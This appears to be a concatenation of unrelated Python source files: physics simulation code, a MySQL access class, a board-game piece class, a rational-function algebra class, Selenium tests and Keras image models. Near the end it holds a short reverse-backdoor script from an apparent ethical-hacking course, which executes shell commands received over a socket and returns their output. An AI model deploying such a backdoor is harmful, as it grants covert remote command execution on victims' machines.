def PML(r, co_ord):
    """Perfectly-matched-layer coordinate stretch S_r.

    Only the z coordinate is stretched: identity (1) inside |z| <= 10 m,
    then a steep complex stretch through the 2 m absorbing layer
    (10 m - 12 m). The imaginary part flips sign with the sign of z so
    waves are damped travelling outward in either direction.

    The original duplicated the whole computation for positive and
    negative z; the branches differed only in the sign of the imaginary
    part, so they are merged here.

    Args:
        r: Value of the unstretched coordinate (float)
        co_ord: Name of the coordinate being stretched (string)
    Returns:
        S_r: the (possibly complex) stretch factor
    """
    if co_ord != 'z':
        return 1
    rAbs = abs(r)
    PMLbegin = 10  # m: PML starts here (the LAPD chamber is 20 m long)
    PMLend = 12    # m: the PML layer is 2 m thick
    if rAbs <= PMLbegin:
        return 1
    # Same quintic profile for the real (evanescent-damping) and imaginary
    # (travelling-wave-damping) parts of the stretch.
    stretch = (25 * (rAbs - PMLbegin)) ** 5
    rampFact = 2
    sign = 1 if r > 0 else -1
    return 1 + (stretch + sign * 1j * stretch) * (((rAbs - PMLbegin) / PMLend) ** rampFact)
#@variable.array(complex = True, shape=(3,3))
def epsilonr_pl(x, y, z):
    """
    Calculates the plasma di-electric tensor at a given point in the plasma.
    Based on the cold plasma approximation.
    Note: A lot of the code here is commented out as it was written for a collisional plasma in a tokamak.
    Args:
        x,y,z: Position in the plasma (float)
    Returns:
        epsR: The plasma di-electric tensor at the given point (3x3 Matrix)
    """
    #Get the magnetic field
    Bx,By,Bz=Bfield(x,y,z)
    #Get the relevant angles for matrix rotation later
    Bmag=Bnorm(x,y,z)
    theta=np.arccos(Bz/Bmag)
    phi=np.pi/2
    if Bx!=0:
        phi=np.arctan(By/Bx)
        # NOTE(review): np.arctan(By/Bx) loses the quadrant; np.arctan2(By, Bx)
        # would be safer if Bx can go negative — confirm against the field model.
    #Get the density of the plasma
    ne=densityConst(x,y,z)
    # NOTE(review): uses the constant-axial debug profile densityConst(),
    # not density() — confirm this is intentional for this run.
    #Get the collisionality of the plasma
    nu_e=collisionality(x,y,z)
    #If the density is too low, the tensor can just be the identity matrix
    if ne < 1e5:
        epsR=np.array([[1,0,0],[0,1,0],[0,0,1]])
        #MFEM uses column major for matrix
        return np.conj(epsR)
    #Calcuate the relevant frequencies
    Pi_he=np.sqrt(ne*q_p**2/(eps_0*4*m_amu)) #Helium plasma frequency
    Pi_e=np.sqrt(ne*q_e**2/(eps_0*m_e)) #Electron plasma frequency
    Omega_he=q_p*Bmag/(4*m_amu) #Helium cyclotron frequency
    Omega_e=q_e*Bmag/(m_e) #Electron cyclotron frequency
    #Calculate R,L and P
    R=1-((Pi_e**2/w**2)*(w/(w+Omega_e)))-((Pi_he**2/w**2)*(w/(w+Omega_he))) #Right-hand polarized wave
    L=1-((Pi_e**2/w**2)*(w/(w-Omega_e)))-((Pi_he**2/w**2)*(w/(w-Omega_he))) #Left-hand polarized wave
    P=1-(Pi_e**2/(w*(w-1j*nu_e)))-(Pi_he**2/w**2) #Unmagnetized plasma
    #Calculate S and D
    S=(R+L)/2
    D=(R-L)/2
    #Construct the di-electric tensor elements
    e_xx=S
    e_xy=-1j*D
    e_xz=0
    e_yx=1j*D
    e_yy=S
    e_yz=0
    e_zx=0
    e_zy=0
    e_zz=P
    #Construct the eps_r matrix in the local frame
    epsRLoc=np.array([[e_xx,e_xy,e_xz],[e_yx,e_yy,e_yz],[e_zx,e_zy,e_zz]])
    #Construct the rotation matrices
    #Phi
    phiMat=np.array([[np.cos(phi),np.sin(phi),0],[-np.sin(phi),np.cos(phi),0],[0,0,1]])
    #Theta
    thetaMat=np.array([[np.cos(theta),0,-np.sin(theta)],[0,1,0],[np.sin(theta),0,np.cos(theta)]])
    #Apply the rotation matrices
    #Apply the phi rotation matrix
    temp=np.matmul(phiMat,epsRLoc)
    epsRtemp=np.matmul(temp,np.linalg.inv(phiMat))
    #Apply the theta rotation matrix
    temp=np.matmul(thetaMat,epsRtemp)
    epsR=np.matmul(temp,np.linalg.inv(thetaMat))
    #MFEM uses column major for matrix
    return np.conj(epsR)
#Plot S_r as a function of z
# Sample the PML stretch across the full chamber (-12 m to 12 m) and show
# its real and imaginary parts; both should be 1/0 inside |z| <= 10 m.
z=np.arange(-12,12.1,0.1)
SArr=[]
for zVal in z:
    SArr.append(PML(zVal,'z'))
plt.plot(z,np.imag(SArr),label='Imaginary')
plt.plot(z,np.real(SArr),label='Real')
plt.legend()
plt.grid(True)
plt.show()
ff10a3f310074cbc47ad8fba13e899ce4e04c11f | Python | abdjiber/prototype-distance-securitaire | /web app/src/db.py | UTF-8 | 4,323 | 2.9375 | 3 | [] | no_license | from mysql.connector import connect
from mysql.connector.errors import InterfaceError
from src.user import USER
from src.position import Position
class DB():
    """Database class for managing Create Read Update Delete Insert operations.

    Each method opens its own MySQL connection (dictionary cursors) and
    closes it before returning.
    """
    def __init__(self, host, db_name, table_name, user_name, user_pwd):
        """Store the connection parameters; no connection is opened here."""
        self.host = host
        self.db_name = db_name
        self.table_name = table_name
        self.user_name = user_name
        self.user_pwd = user_pwd
        self.cursor = None
    def connect(self):
        """Database connector fonction.
        Doesn't work. Connection is lost when setting it to the classe attribute cursor.
        """
        # NOTE(review): the connection object 'conn' is never stored, so it is
        # garbage-collected and the saved cursor becomes unusable — which is
        # why every other method opens its own connection instead.
        conn = connect(host=self.host,
                       user=self.user_name,
                       passwd=self.user_pwd,
                       database=self.db_name)
        cursor = conn.cursor(dictionary=True)
        self.cursor = cursor
    def insert_user_into_db(self, user):
        """Insert a user row (id, city, latitude, longitude) into the table."""
        conn = connect(host=self.host,
                       user=self.user_name,
                       passwd=self.user_pwd,
                       database=self.db_name)
        cursor = conn.cursor(dictionary=True)
        sql = f"INSERT INTO {self.db_name}.{self.table_name}(id, city, latitude, \
            longitude) VALUES(%s, %s, %s, %s)"
        vals = (
            user.id,
            user.city,
            str(user.position.lat),
            str(user.position.lng),
        )
        cursor.execute(sql, vals)  # parameterized query: values are escaped
        conn.commit()
        cursor.close()
        conn.close()
    def delete_from_db(self, id_):
        """Delete a user from the database."""
        conn = connect(host=self.host,
                       user=self.user_name,
                       passwd=self.user_pwd,
                       database=self.db_name)
        cursor = conn.cursor(dictionary=True)
        sql = f"DELETE FROM {self.db_name}.{self.table_name} WHERE id=%s"
        vals = (id_, )
        cursor.execute(sql, vals)
        conn.commit()
        cursor.close()
        conn.close()
    def update_position(self, user):
        """Update user information into the database"""
        conn = connect(host=self.host,
                       user=self.user_name,
                       passwd=self.user_pwd,
                       database=self.db_name)
        cursor = conn.cursor(dictionary=True)
        sql = (f"UPDATE {self.db_name}.{self.table_name} set latitude=%s,"
               "longitude=%s WHERE id=%s")
        vals = (
            user.position.lat,
            user.position.lng,
            user.id,
        )
        cursor.execute(sql, vals)
        conn.commit()
        cursor.close()
        conn.close()
    def get_user_by_id(self, id_):
        """Get a user from the database by his ID"""
        conn = connect(host=self.host,
                       user=self.user_name,
                       passwd=self.user_pwd,
                       database=self.db_name)
        cursor = conn.cursor(dictionary=True)
        sql = f"SELECT * FROM {self.db_name}.{self.table_name} WHERE id=%s"
        vals = (id_, )
        cursor.execute(sql, vals)
        try:
            res = cursor.fetchall()[0]
        except InterfaceError as err: # if no data was returned
            # NOTE(review): an empty result actually raises IndexError from
            # [0] (not InterfaceError), and the fallback res = [] would make
            # the res['city'] access below fail — confirm intended handling.
            res = []
        cursor.close()
        conn.close()
        user = USER(city=res['city'],
                    min_distance=res['min_distance'],
                    position=Position(lat=res['latitude'],
                                      lng=res['longitude']))
        user.setId(res['id'])
        return user
    def get_users_same_city(self, city):
        """Get the users form the same city in the database"""
        conn = connect(host=self.host,
                       user=self.user_name,
                       passwd=self.user_pwd,
                       database=self.db_name)
        cursor = conn.cursor(dictionary=True)
        sql = f"SELECT * FROM {self.db_name}.{self.table_name} WHERE city=%s"
        vals = (city, )
        cursor.execute(sql, vals)
        try:
            users_same_city = cursor.fetchall()
        except InterfaceError as err: # if no data was returned
            users_same_city = []
        cursor.close()
        conn.close()
        return users_same_city
| true |
0b7ffb177cfecbb6638f73d0c6ec4f3b712d9e40 | Python | thinkingjxj/Python | /mark/装饰器/sort.py | UTF-8 | 701 | 3.53125 | 4 | [] | no_license | __author__ = 'thinking'
#sorted()
# def sort(iterable, reverse = False):
#new = []
#for x in iterable:
# new.append(x)
# return new
lst = [1,7,4,7,3,9,8]
def sort(iterable):
new = []
for x in iterable:
for i,y in enumerate(new):
if x > y:
new.insert(i,x)
break
else:
new.append(x)
return new
print(sort(lst))
def sort(iterable, reverse = False):
new = []
for x in iterable:
for i,y in enumerate(new):
flag = x > y if reverse else x < y
if flag:
new.insert(i,x)
else:
new.append(x)
return new
print(sort(lst)) | true |
e817f09dca70e4bfda8201d655d1bc44636f9866 | Python | JoJaJones/GessGame | /Piece.py | UTF-8 | 3,698 | 3.359375 | 3 | [] | no_license | from Board import Board
# noinspection PyMethodMayBeStatic
class Piece:
def __init__(self, pos: tuple, color: str, board: Board):
self._pos = pos
self._board = board
self._color = color
self._stones = {}
self._num_stones = 0
self._center_stone = False
self._max_move = 0
self.load_stones()
self._is_valid = True
def get_pos(self):
return self._pos
def load_stones(self):
row, col = self._pos
for i in range(-1, 2):
for j in range(-1, 2):
stone = self._board.get_piece_at_pos((row + i, col + j))
if stone:
if stone.get_color() == self._color:
self._num_stones += 1
if i == 0 and j == 0:
self._center_stone = True
self._max_move = 20
self._stones[(i, j)] = stone
else:
self._is_valid = False
return
if not self._center_stone:
self._max_move = 3
def is_ring(self):
return self._num_stones == 8 and not self._center_stone
def get_members_at_edge(self, direction: tuple):
stones = []
c_shift, r_shift = direction
row, col = direction
c_shift = abs(c_shift)
r_shift = abs(r_shift)
for i in range(-1, 2):
stones.append((row + r_shift * i, col + c_shift * i))
return stones
def check_move(self, dest):
e_row, e_col = dest
s_row, s_col = self._pos
direction = self._board.get_direction(self._pos, dest)
if direction is None:
return False
stones = []
if direction[0]:
stones += self.get_members_at_edge((direction[0], 0))
if direction[1]:
stones += self.get_members_at_edge((0, direction[1]))
if (direction[0], direction[1]) not in self._stones:
return False
if max(abs(e_row - s_row), abs(e_col - s_col)) > self._max_move:
return False
stones = set(stones)
for stone_pos in stones:
r_shift, c_shift = stone_pos
s_start = s_row + r_shift, s_col + c_shift
s_end = e_row + r_shift, e_col + c_shift
if stone_pos in self._stones and not self._stones[stone_pos].check_move(s_end):
return False
elif not self._board.is_unobstructed(s_start, s_end):
return False
return True
def perform_move(self, dest: tuple):
self.update_board(dest)
def update_board(self, dest):
stone_positions = self.get_stone_pos().union(self.get_stone_pos(dest))
row, col = dest
for pos in stone_positions:
stone = self._board.get_piece_at_pos(pos)
if stone:
stone.update_pos()
for stone_pos in self._stones:
r_shift, c_shift = stone_pos
stone = self._stones[stone_pos]
stone.update_pos((row + r_shift, col + c_shift))
def get_stone_pos(self, pos = None):
stones = []
if pos:
row, col = pos
else:
row, col = self._pos
for i in range(-1,2):
for j in range(-1,2):
stones.append((row + i, col + j))
stones = set(stones)
return stones
def is_valid(self):
if self._is_valid:
if self._num_stones > 1:
return True
if self._num_stones == 1 and not self._center_stone:
return True
return False
| true |
2b5ed985dad52c9dfaf8d79c0ea40f05888312e9 | Python | leoli1/RischAlgorithm | /src/RationalFunction.py | UTF-8 | 14,648 | 2.90625 | 3 | [] | no_license | '''
Created on 22.09.2018
@author: Leonard
'''
from __future__ import division
import FieldExtension as FE
import Polynomial as Pol
from Utils import *
import Number
class RationalFunction(object):
def __init__(self, numerator, denominator):
self.__derivative = None
self.__logDerivative = None
self.numerator = numerator
self.denominator = denominator
while type(self.numerator) is RationalFunction or type(self.denominator) is RationalFunction:
if type(self.numerator)==RationalFunction:
tempNum = self.numerator
self.numerator = self.numerator.numerator
self.denominator = self.denominator*tempNum.denominator
if type(self.denominator)==RationalFunction:
tempDenom = self.denominator
self.numerator = self.numerator*self.denominator.denominator
self.denominator = tempDenom.numerator
if isNumber(self.numerator):
if isNumber(denominator):
self.denominator = Pol.Polynomial([self.denominator])
self.numerator = Pol.Polynomial([self.numerator],variable=self.denominator.variable)#fieldTower=self.denominator.fieldTower)
elif isNumber(self.denominator):
self.denominator = Pol.Polynomial([self.denominator],variable=self.numerator.variable)#fieldTower = self.numerator.fieldTower)
numFieldTower = self.numerator.getFieldTower()
denomFieldTower = self.denominator.getFieldTower()
if numFieldTower!=denomFieldTower:
if numFieldTower.isExtendedTowerOf(denomFieldTower):
self.denominator = Pol.Polynomial([self.denominator],variable=self.numerator.variable)#fieldTower=numFieldTower)
elif denomFieldTower.isExtendedTowerOf(numFieldTower):
self.numerator = Pol.Polynomial([self.numerator],variable=self.denominator.variable)#fieldTower=denomFieldTower)
else:
raise Exception()
#self.fieldTower = self.numerator.fieldTower
self.variable = self.numerator.variable
self.removeCommonFactors()
if self.denominator.isConstant():
self.numerator = self.numerator/self.denominator.getConstant()
self.denominator = Pol.Polynomial([1],variable=self.variable)
elif self.denominator.deg0():
self.numerator = self.numerator/self.denominator
self.denominator = Pol.Polynomial([Number.ONE],variable=self.variable)
self.makeDenominatorMonicInPlace()
@property
def fieldTower(self):
return self.variable.fieldExtension.fieldTower
def isConstant(self):
if isNumber(self.numerator):
return numberIsZero(self.numerator) or isNumber(self.denominator) or self.denominator.isConstant()
if self.numerator.isConstant():
return numberIsZero(self.numerator.getConstant()) or isNumber(self.denominator) or self.denominator.isConstant()
return False
def getConstant(self):
if not self.isConstant():
return None
if isNumber(self.numerator):
if numberIsZero(self.numerator):
return 0
if isNumber(self.denominator):
return self.numerator/self.denominator
else:
return self.numerator/self.denominator.getConstant()
else:
if self.numerator.isZero():
return 0
if isNumber(self.denominator):
return self.numerator.getConstant()/self.denominator
else:
return self.numerator.getConstant()/self.denominator.getConstant()
def isZero(self):
return objEqualsNumber(self.getConstant(),Number.ZERO)
# ========================================== Field Tower/Extension =========================================
def getFieldTower(self):
return self.fieldTower
def getFieldExtension(self):
return self.getFieldTower().getLastExtension()
def removeCommonFactors(self):
"""
cancels common factors, so that: numerator/denominator = p/q with gcd(p,q)=1
"""
gcd = Pol.PolyGCD(self.numerator, self.denominator)
if not gcd==1:
self.numerator = Pol.PolyDiv(self.numerator, gcd)[0]
self.denominator = Pol.PolyDiv(self.denominator,gcd)[0]
def reduceToFieldTower(self, targetFieldTower):
if isNumber(self.numerator):
newNum = Pol.Polynomial([self.numerator],variable=targetFieldTower.getLastVariable())
else:
newNum = self.numerator.reduceToFieldTower(targetFieldTower)
if isNumber(self.denominator):
newDenom = Pol.Polynomial([self.denominator],variable=targetFieldTower.getLastVariable())
else:
newDenom = self.denominator.reduceToFieldTower(targetFieldTower)
if newNum==None or newDenom==None:
return None
return RationalFunction(newNum,newDenom)#newNum/newDenom#RationalFunction(newNum,newDenom,fieldTower=targetFieldTower)
def reduceToLowestPossibleFieldTower(self):
if self.fieldTower.towerHeight==1:
return self
r = self.reduceToFieldTower(self.fieldTower.prevTower())
if r==None:
return self
else:
return r.reduceToLowestPossibleFieldTower()
def isLowestFieldTower(self):
r = self.reduceToFieldTower(self.fieldTower.prevTower())
return r==None
# ========================================== Differentiate stuff =========================================
def differentiate(self):
p = self.numerator
q = self.denominator
if isNumber(p):
dp = 0
else:
dp = p.differentiate()
if isNumber(q):
dq = 0
else:
dq = q.differentiate()
num = dp*q+(-1)*p*dq
denom = q*q
self.__derivative = RationalFunction(num,denom)
return self.__derivative# (p/q)' = (p'q-pq')/(q^2)
def logDifferentiate(self):
if id(self.__logDerivative)!=id(None):
return self.__logDerivative
self.__logDerivative = self.differentiate()/self
return self.__logDerivative
# ========================================== Arithmetic stuff =========================================
def updateCoefficientsAll(self):
self.numerator.updateCoefficientsAll()
self.denominator.updateCoefficientsAll()
def Inverse(self):
return RationalFunction(self.denominator,self.numerator)
def makeDenominatorMonic(self):
if isNumber(self.denominator):
return
lcoeff = self.denominator.getLeadingCoefficient()
lcoeff_poly = Pol.Polynomial(coefficients=[lcoeff],variable=self.variable)
if isNumber(self.numerator):
newNumerator = Pol.Polynomial([self.numerator],variable=self.variable)/lcoeff_poly
else:
newNumerator = self.numerator/lcoeff_poly
newDenominator = self.denominator/lcoeff_poly
return RationalFunction(newNumerator,newDenominator)
def makeDenominatorMonicInPlace(self):
if isNumber(self.denominator):
return
lcoeff = self.denominator.getLeadingCoefficient()
lcoeff_poly = Pol.Polynomial(coefficients=[lcoeff],variable=self.variable)
if isNumber(self.numerator):
self.numerator = Pol.Polynomial([self.numerator],variable=self.variable)/lcoeff_poly
else:
self.numerator = self.numerator/lcoeff_poly
self.denominator = self.denominator/lcoeff_poly
def asPolynomial(self):
self.numerator.simplifyCoefficients()
self.denominator.simplifyCoefficients()
c = self.denominator.getConstant()
if c==None:
denom = self.denominator.reduceToLowestPossibleFieldTower()
if denom.fieldTower.towerHeight<self.numerator.fieldTower.towerHeight:
return self.numerator/denom
(q,r) = Pol.PolyDiv(self.numerator, self.denominator)
if r==0:
return q
return None
return self.numerator*(1/c)
def simplified(self):
num = self.numerator.simplified()
denom = self.denominator.simplified()
return RationalFunction(num,denom)
def BasicPartialFraction(self, denomFactorization):
return Pol.PartialFractionWithPowerFactorization(self.numerator, denomFactorization)
def replaceNumbersWithRationals(self):
if not isNumber(self.numerator):
self.numerator.replaceNumbersWithRationals()
if not isNumber(self.denominator):
self.denominator.replaceNumbersWithRationals()
def completeEvaluate(self, val):
return self.numerator.completeEvaluate(val)/self.denominator.completeEvaluate(val)
def __radd__(self, other):
return self.__add__(other)
def __add__(self, other):
#if other==0:
# return self
if isNumber(other):
if other==0:
return self
return self.__add__(Pol.Polynomial([other],variable=self.variable))
if other.isZero():
return self
if type(other)==Pol.Polynomial or isPoly(other):
return self.__add__(other.asRational())
num = self.numerator*other.denominator+self.denominator*other.numerator
den = self.denominator*other.denominator
return RationalFunction(num,den)
def __sub__(self, other):
return self.__add__((-1)*other)
def __rmul__(self, other):
return self.__mul__(other)
def __mul__(self, other):
#if other==1:
# return self
#if other==0:
# return 0
if isNumber(other):
if other==0:
return 0
elif other==1:
return self
return RationalFunction(self.numerator*other,self.denominator)
if type(other)==Pol.Polynomial or isPoly(other):
return self.__mul__(other.asRational())
num = self.numerator*other.numerator
den = self.denominator*other.denominator
return RationalFunction(num,den)
def __neg__(self):
return (-1)*self
def __rtruediv__(self, other):
return self.Inverse()*other
def __truediv__(self, other):
if isNumber(other):
return self.__mul__(1/other)
if isPoly(other):
return self.__truediv__(other.asRational())
newNum = self.numerator*other.denominator
newDenom = self.denominator*other.numerator
return RationalFunction(newNum,newDenom)
def isConstantMultipleOf(self, other):
c = (self/other).getConstant()
return False if c==None else c
def __eq__(self, other):
if other==None:
return False
return (self+(-1)*other).isZero()
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return self.__str__()
# ========================================== String output =========================================
def __str__(self):
out = ""
if not isNumber(self.numerator) and not self.numerator.isConstant() and self.denominator!=1:
out = "["+str(self.numerator)+"]"
elif isNumber(self.numerator):
out = str(self.numerator)
elif self.denominator==1:
out = str(self.numerator)
else:
out = str(self.numerator.getLeadingCoefficient())
if self.numerator==0:
return "0"
d = str(self.denominator)
if self.denominator==1:
return out
return out+"/["+d+"]"
def __repr__(self):
return self.__str__()
def strCustomVar(self, variable):
out = "["+str(self.numerator.strCustomVar(variable))+"]"
if self.numerator==0:
return out
d = str(self.denominator.strCustomVar(variable))
if d=="(1)":
return out
return out+"/["+d+"]"
def printFull(self):
out = ""
if not isNumber(self.numerator) and not self.numerator.isConstant() and self.denominator!=1:
out = "["+self.numerator.printFull()+"]"
elif isNumber(self.numerator):
out = str(self.numerator)
elif self.denominator==1 or (not isNumber(self.denominator) and objEqualsNumber(self.denominator.getConstant(),1)):
out = self.numerator.printFull()
else:# => self.numerator.isConstant() = True
out = self.numerator.printFull()
if self.numerator==0:
return "0"
if isNumber(self.denominator):
d = str(self.denominator)
else:
d = self.denominator.printFull()
if self.denominator==1:
return out
if len(d)==1:
return out + "/"+d
return out+"/["+d+"]"
if __name__=='__main__':
pass
"""FE.fieldTower = FE.FieldTower()
polA = Pol.Polynomial(coefficients=[1,2,1])
polB = Pol.Polynomial(coefficients=[2,1])
ratA = RationalFunction(polA,polB)
print(ratA)
polC = Pol.Polynomial(coefficients=[-1,0,1])
polD = Pol.Polynomial(coefficients=[1,1])
ratB = RationalFunction(polC,polD)
print(ratB)
fieldExtension1 = FE.FieldExtension(FE.TRANS_EXP,Pol.Polynomial([0,1]),"T_1") # field extension with e^x=exp(x)
fieldExtension2 = FE.FieldExtension(FE.TRANS_EXP,Pol.Polynomial([0,1],field=1),"T_2") # field extension with exp(exp(x))
FE.fieldTower = FE.FieldTower(fieldExtensions=[fieldExtension1,fieldExtension2])
polE = Pol.Polynomial(coefficients=[polA,polC],field=1)
polF = Pol.Polynomial(coefficients=[polB,polD],field=1)
ratC = RationalFunction(polE,polF,field=1)
print(ratC)
ratC.MakeDenominatorMonic()
print(ratC)
print("[{}]'={}".format(ratA,ratA.differentiate()))
polE = Pol.Polynomial(coefficients=[])
polA = Pol.Polynomial([4])
polB = Pol.Polynomial([3])
ratA = RationalFunction(polA,polB)
print(ratA)
x = Pol.Polynomial([0,1])
polA = Pol.Polynomial([0,x],field=1)
polB = Pol.Polynomial([0,polA],field=2)
polC = Pol.Polynomial([polA],field=2)
print(polB,polC)
print(polB/polC)
print(polB.getCoefficients())""" | true |
b2518db55f1e23c7185e841286781dd7311f14bf | Python | AsjmSitd/Selenium_pytest_course_p | /test_main_page.py | UTF-8 | 1,606 | 2.59375 | 3 | [] | no_license | import pytest
from .pages.main_page import MainPage
from .pages.base_page import BasePage
from .pages.login_page import LoginPage
from .pages.basket_page import BasketPage
from .pages.product_page import ProductPage
@pytest.mark.login_guest
class TestLoginFromMainPage():
def test_guest_can_go_to_login_page(self, browser):
link = "http://selenium1py.pythonanywhere.com/"
page = BasePage(browser, link) # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес
page.open() # открываем страницу
page.go_to_login_page() # выполняем метод страницы — переходим на страницу логина
def test_guest_should_see_login_link(self, browser):
link = "http://selenium1py.pythonanywhere.com/"
page = BasePage(browser, link)
page.open()
page.should_be_login_link()
def test_guest_cant_see_product_in_basket_opened_from_main_page(browser):
link = "http://selenium1py.pythonanywhere.com/"
page = BasePage(browser, link)
page.open()
bp = BasketPage(browser, link)
bp.go_to_basket()
bp.should_not_present()
bp.should_be_msg()
def test_guest_can_go_to_login_page(browser):
link = "http://selenium1py.pythonanywhere.com"
page = MainPage(browser, link)
page.open()
page.go_to_login_page()
login_page = LoginPage(browser, browser.current_url)
login_page.should_be_login_page()
| true |
d5537590e1b21f6061e33992fda4fd198a88cafb | Python | fernandopersan/4EscolaBigData | /code_GPU_local/AutoEncoder.py | UTF-8 | 4,060 | 2.8125 | 3 | [] | no_license | import os
import numpy as np
from PIL import Image
from keras.models import Model
from keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Reshape, UpSampling2D, Conv2DTranspose
from keras.models import load_model
from keras.datasets import cifar10
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
#--------------------------------------------------------------------------------------------------------------------------------------------------------------
def loadingImages():
print("\tLoading CIFAR10 images ...")
(Xtrain, Ytrain), (Xtest, Ytest) = cifar10.load_data()
Xtrain, Ytrain = lowSampleDataset(Xtrain, Ytrain)
Xtest, Ytest = lowSampleDataset(Xtest, Ytest)
print('\t\tTraining set shape: ', Xtrain.shape)
print('\t\tTesting set shape: ', Xtest.shape)
return Xtrain/255, Ytrain, Xtest/255, Ytest
def lowSampleDataset(X, Y):
perm = np.random.permutation(X.shape[0])
X = X[perm[0 : (int)(X.shape[0] * (5/100))]]
Y = Y[perm[0 : (int)(Y.shape[0] * (5/100))]]
return X, Y
def definingAutoEncoder():
print("\tDefining the AE ...")
input_img = Input(shape=(32, 32, 3,))
encoder = Conv2D(8, kernel_size=(3,3), strides=(2, 2), padding='same', activation='relu')(input_img)
encoder = Conv2D(8, kernel_size=(3,3), padding='valid', activation='relu')(encoder)
encoder = MaxPooling2D(pool_size=(2, 2))(encoder)
encoder = Flatten(name='code')(encoder)
decoder = Reshape((7,7,8))(encoder)
decoder = UpSampling2D((2,2))(decoder)
decoder = Conv2DTranspose(8, kernel_size=(3,3), padding='valid', activation='relu')(decoder)
decoder = Conv2DTranspose(3, kernel_size=(3,3), strides=(2, 2), padding='same', activation='relu')(decoder)
autoencoder = Model(input_img, decoder)
autoencoder.compile(loss='mean_squared_error', optimizer='adam')
autoencoder.summary()
return autoencoder
def trainingAE(Xtrain, autoencoder, batchSize, numberEpochs):
if not (os.path.exists("_FineTuning/")):
os.makedirs("_FineTuning/")
print("\tTraining the AE ...")
historyAE = autoencoder.fit(x=Xtrain, y=Xtrain, batch_size=batchSize, epochs=numberEpochs, shuffle=True, verbose=1)
autoencoder.save_weights('_FineTuning/ae_weights.h5')
autoencoder.save('_FineTuning/ae_model.h5')
print("\tPloting the training performance ...")
plt.plot(historyAE.history['loss'])
plt.ylabel('Loss')
plt.legend(['AE'], loc='upper right')
plt.savefig("_FineTuning/ae_training.png")
plt.close()
def featureExtractionCNN(Xtrain, Xtest):
print("\tFeature extraction with AutoEncoder ...")
ae = load_model('_FineTuning/ae_model.h5')
ae.load_weights('_FineTuning/ae_weights.h5')
ae = Model(inputs=ae.input, outputs=ae.get_layer(name='code').output)
prediction = np.array(ae.predict(Xtrain))
Xtrain = np.reshape(prediction, (prediction.shape[0], prediction.shape[1]))
prediction = np.array(ae.predict(Xtest))
Xtest = np.reshape(prediction, (prediction.shape[0], prediction.shape[1]))
print('\t\tFeatures training shape: ', Xtrain.shape)
print('\t\tFeatures testing shape: ', Xtest.shape)
return Xtrain, Xtest
def classificationSVM(Xtrain, Ytrain, Xtest, Ytest):
print("\tClassification with Linear SVM ...")
svm = SVC(kernel='linear')
svm.fit(Xtrain, np.ravel(Ytrain, order='C'))
result = svm.predict(Xtest)
acc = accuracy_score(result, np.ravel(Ytest, order='C'))
print("\t\tAccuracy Linear SVM: %0.4f" % acc)
#--------------------------------------------------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
batchSize = 32
numberEpochs = 10
Xtrain, Ytrain, Xtest, Ytest = loadingImages()
autoencoder = definingAutoEncoder()
trainingAE(Xtrain, autoencoder, batchSize, numberEpochs)
Xtrain, Xtest = featureExtractionCNN(Xtrain, Xtest)
classificationSVM(Xtrain, Ytrain, Xtest, Ytest) | true |
4f518f6050081ba888c30a1fb6b7a3142f87d5eb | Python | C-BOE86/Python-Ethical-Hacking-Tools | /15 listener_and_backdoor/reverse_backdoor_1.py | UTF-8 | 442 | 2.859375 | 3 | [] | no_license | #!/usr/bin/python
import socket
import subprocess
def execute_system_commmand(command):
return subprocess.check_output(command,shell=True)
connection=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection.connect(("localhost",1234))
#connection.send("[+]Connection Estabilshed.\n")
while True:
command = connection.recv(1024)
command_result = execute_system_commmand(command)
connection.send(command_result)
connection.close() | true |
cc894a59f747ecdb155886ad3af84dc56ad2b49e | Python | AnhVuH/VuHongAnh_Labs_c4e16 | /Lab03/homework/sum.py | UTF-8 | 50 | 2.859375 | 3 | [] | no_license | def sum(a,b):
print(a + b)
sum(3,4)
sum(2,9)
| true |
698e3908aa29dbdd772fe4fa15bbd771bc8ff740 | Python | namanjh/HandwrittenDigitTensor | /train.py | UTF-8 | 2,718 | 3.3125 | 3 | [] | no_license | use the ImageDataGenerator class to stop overfitting..
#use the flow_from_directory method to classify the images automatically...
from keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(rescale = 1./255, shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
training_set = train_datagen.flow_from_directory('trainingSet', target_size = (28,28), batch_size = 32, class_mode = "categorical")
testing_set = test_datagen.flow_from_directory('testSet', target_size = (28,28), batch_size = 32, class_mode = "categorical")
#----------------------------------------------------------------------------------------------------
#part 1 --- Building the convolutional neural network
from keras.models import Sequential #used in initialization
from keras.layers import Conv2D #used for first step, convolution layer, to make images into 2D array
from keras.layers import MaxPooling2D #used for pooling layers
from keras.layers import Flatten #convert pool feature map into vector
from keras.layers import Dense #used to add fully connected layer
from keras.layers import Dropout
import tensorflow as tf
#initializing the neural network
classifier = Sequential()
#convolutional layer-- changing the image using the feature map
classifier.add(Conv2D(28,kernel_size = (3,3), input_shape = (28,28,1), activation = 'relu'))
#max pooling-- reducing the size of the image matrix while keeping the features intact
classifier.add(MaxPooling2D(pool_size = (2,2)))
#convolutional layer-- changing the image using the feature map
classifier.add(Conv2D(28,kernel_size = (3,3), input_shape = (28,28,1), activation = 'relu'))
#max pooling-- reducing the size of the image matrix while keeping the features intact
classifier.add(MaxPooling2D(pool_size = (2,2)))
#flattening-- changing matrix into vector as input layer
classifier.add(Flatten())
#full-connection layer--creating an ANN(also called hidden layer)
classifier.add(Dense(128, activation = tf.nn.relu))
classifier.add(Dropout(0.2))
#output-layer
classifier.add(Dense(10,activation = "softmax"))
#compiling the CNN
classifier.compile(optimizer = "adam", loss = "categorical_crossentropy", metrics = ["accuracy"])
#-----------------------------------------------------------------------------------------------
#Part 2 -- Fitting the CNN to the images
classifier.fit_generator(training_set, samples_per_epoch =41000, nb_epoch = 25, validation_data = testing_set, nb_val_samples = 1030)
#------------------------------------------------------------------------------------------------
#part 3 --- saving the model
classifier.save("my_new_model.h5")
| true |
5e9e400b8ae35332033a34273c5c0412275b3929 | Python | UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018 | /students/jeanruggiero/class08/nosql-assignment/src/neo4j_assignment.py | UTF-8 | 3,947 | 3.5625 | 4 | [] | no_license | """
neo4j example
